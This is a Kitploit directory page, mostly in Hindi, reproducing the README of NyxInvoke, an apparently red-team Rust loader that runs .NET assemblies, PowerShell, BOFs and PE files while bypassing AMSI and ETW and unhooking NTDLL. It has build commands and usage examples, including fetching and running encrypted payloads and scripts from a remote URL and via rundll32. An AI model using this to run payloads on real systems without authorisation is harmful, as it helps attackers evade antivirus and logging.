Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
NyxInvoke — NyxInvoke एक Rust CLI टूल है जो .NET असेंबली, PowerShell और BOFs को पैचलेस AMSI और ETW बायपास सुविधाओं के साथ चलाने के लिए है। दोहरे-निर्माण समर्थन के साथ | Kitploit
उपकरण/GitHubGitHub/blacksnufkin/nyxinvoke
शोषणआईडीएस/आईपीएस से बचनाशेलकोडपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvoke एक Rust CLI टूल है जो .NET असेंबली, PowerShell और BOFs को पैचलेस AMSI और ETW बायपास सुविधाओं के साथ चलाने के लिए है। दोहरे-निर्माण समर्थन के साथ

2433011 साल पहलेKitploit द्वारा समीक्षित
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

NyxInvoke

NyxInvoke एक बहुमुखी Rust-आधारित टूल है जो .NET असेंबली, PowerShell कमांड/स्क्रिप्ट, Beacon Object Files (BOFs) और PE फ़ाइलों को निष्पादित करने के लिए डिज़ाइन किया गया है, जिसमें अंतर्निहित Ntdll Unhooking, पैचलेस AMSI और ETW बाईपास क्षमताएँ हैं। इसे एक स्वतंत्र निष्पादन योग्य या DLL के रूप में संकलित किया जा सकता है।

विशेषताएँ

  • .NET असेंबली निष्पादित करें
  • PowerShell कमांड या स्क्रिप्ट चलाएँ
  • Beacon Object Files (BOFs) लोड करें और निष्पादित करें
  • PE फ़ाइलें (EXEs) लोड करें और निष्पादित करें
  • अंतर्निहित पैचलेस AMSI (एंटी-मैलवेयर स्कैन इंटरफ़ेस) बाईपास
  • अंतर्निहित पैचलेस ETW (इवेंट ट्रेसिंग फॉर विंडोज) बाईपास
  • अंतर्निहित NTDLL अनहुक, "PspCreateProcessNotifyRoutine" कॉलबैक को ट्रिगर किए बिना
  • AES डिक्रिप्शन के साथ एन्क्रिप्टेड पेलोड का समर्थन
  • लचीले इनपुट विकल्प: स्थानीय फ़ाइलें, URL, या संकलित-इन डेटा
  • दोहरी-निर्माण समर्थन: एक निष्पादन योग्य या DLL के रूप में संकलित किया जा सकता है

निर्माण

NyxInvoke को एक निष्पादन योग्य या DLL के रूप में बनाया जा सकता है। निम्नलिखित कमांड का उपयोग करें:

निष्पादन योग्य

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

संकलित-इन CLR, BOF या PE डेटा शामिल करने के लिए, संबंधित फीचर जोड़ें:

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

या

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

उपयोग

निष्पादन योग्य मोड

निष्पादन योग्य चार मुख्य संचालन मोड का समर्थन करता है:

  1. CLR मोड (.NET असेंबली निष्पादन)
  2. PowerShell मोड
  3. BOF मोड (Beacon Object File निष्पादन)
  4. PE मोड (PE फ़ाइल निष्पादन)

सामान्य वाक्यविन्यास

root@kitploit:~
NyxInvoke.exe <mode> [OPTIONS]

जहाँ <mode> निम्न में से एक है: clr, ps, bof या pe।

DLL मोड

जब DLL के रूप में संकलित किया जाता है, तो NyxInvoke को rundll32 का उपयोग करके निष्पादित किया जा सकता है। वाक्यविन्यास है:

root@kitploit:~
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

मोड-विशिष्ट विकल्प

  1. CLR मोड:
root@kitploit:~
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. BOF मोड:
root@kitploit:~
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PE मोड:
root@kitploit:~
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PowerShell मोड:
root@kitploit:~
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

उदाहरण

निष्पादन योग्य मोड

  1. CLR मोड (रिमोट निष्पादन):

    root@kitploit:~
    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. PowerShell मोड (स्क्रिप्ट निष्पादन):

    root@kitploit:~
    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. BOF मोड (स्थानीय निष्पादन):

    root@kitploit:~
    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. PE मोड (संकलित निष्पादन):

    root@kitploit:~
    NyxInvoke.exe pe --args arg1
    

DLL मोड

  1. CLR मोड (रिमोट निष्पादन):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. PowerShell मोड (डायरेक्ट कमांड निष्पादन):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. BOF मोड (संकलित निष्पादन):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. PE मोड (स्थानीय अनएन्क्रिप्टेड निष्पादन):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

परीक्षण संसाधन

resources निर्देशिका में, आपको NyxInvoke की कार्यक्षमता का परीक्षण करने के लिए कई फ़ाइलें मिलेंगी:

  1. एन्क्रिप्टेड CLR असेंबली (Seatbelt):

    • फ़ाइल: clr_data.enc
    • विवरण: Seatbelt टूल का एक एन्क्रिप्टेड संस्करण, सिस्टम जानकारी एकत्र करने के लिए एक C# प्रोजेक्ट।
    • उपयोग उदाहरण:
      root@kitploit:~
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. एन्क्रिप्टेड BOF (निर्देशिका सूची):

    • फ़ाइल: bof_data.enc
    • विवरण: एक एन्क्रिप्टेड Beacon Object File जो निर्दिष्ट फ़ाइल के लिए उपयोगकर्ता अनुमतियाँ सूचीबद्ध करता है, वाइल्डकार्ड समर्थित हैं।
    • उपयोग उदाहरण:
      root@kitploit:~
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. एन्क्रिप्टेड PE (मैसेज बॉक्स):

    • फ़ाइल: pe_data.enc
    • विवरण: एक एन्क्रिप्टेड PE फ़ाइल जो मैसेज बॉक्स प्रदर्शित करती है।
    • उपयोग उदाहरण:
      root@kitploit:~
      NyxInvoke.exe pe
      
  4. Powershell (मैसेज बॉक्स):

    • फ़ाइल: ps.ps1
    • विवरण: एक PowerShell स्क्रिप्ट जो मैसेज बॉक्स प्रदर्शित करती है।
    • उपयोग उदाहरण:
      root@kitploit:~
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

स्क्रीनशॉट

  • DLL संकलित CLR निष्पादन

Screenshot 2024-09-18 123147

  • EXE रिमोट BOF निष्पादन

Screenshot 2024-09-18 123410

  • DLL संकलित EXE निष्पादन

pe

  • DLL PowerShell स्क्रिप्ट निष्पादन

Screenshot 2024-09-18 123547

कानूनी नोटिस

यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। किसी भी वातावरण में उपयोग से पहले सुनिश्चित करें कि आपके पास उचित अनुमतियाँ हैं।

क्रेडिट

  • @yamakadi clroxide प्रोजेक्ट के लिए
  • @hakaioffsec coffee प्रोजेक्ट के लिए
टूल डाउनलोड करें